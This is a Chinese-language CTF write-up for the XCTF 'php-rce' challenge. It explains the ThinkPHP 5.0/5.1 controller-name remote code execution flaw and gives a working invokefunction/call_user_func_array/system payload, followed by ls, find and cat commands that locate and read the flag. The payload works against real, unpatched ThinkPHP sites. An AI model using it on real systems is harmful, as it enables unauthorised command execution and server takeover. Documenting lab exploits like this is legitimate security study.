[攻防世界]php-rce

这是一个关于ThinkPHP 5的框架漏洞，觉得日后可能会用的上，所以记录下这个题。漏洞相关信息如下：

ThinkPHP官方2018年12月9日发布重要的安全更新，修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新，由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞，受影响的版本包括5.0和5.1版本，推荐尽快更新到最新版本。

漏洞成因

由于ThinkPHP5框架对控制器名没有进行足够的安全检测，导致在没有开启强制路由的情况下，黑客构造特定的请求，可直接GetWebShell。

影响版本

ThinkPHP 5.0系列 < 5.0.23
ThinkPHP 5.1系列 < 5.1.31

漏洞利用

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php -r 'system("");'

修改最后system的执行代码就可以触发命令执行漏洞，从而读取服务器信息。

首先扫个目录

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php -r 'system("ls");'

得到一下信息：

favicon.ico index.php robots.txt router.php static static

没什么玩意儿有用，但是因为之前通过报错知道了服务器是linux 所以可以用find命令找跟flag相关的文件。

修改ls为find / -name 'flag'

得到/flag /flag尝试读取 但是因为不知道具体路径 所以可以直接cat语句执行

cat ../../../../../flag

得到flag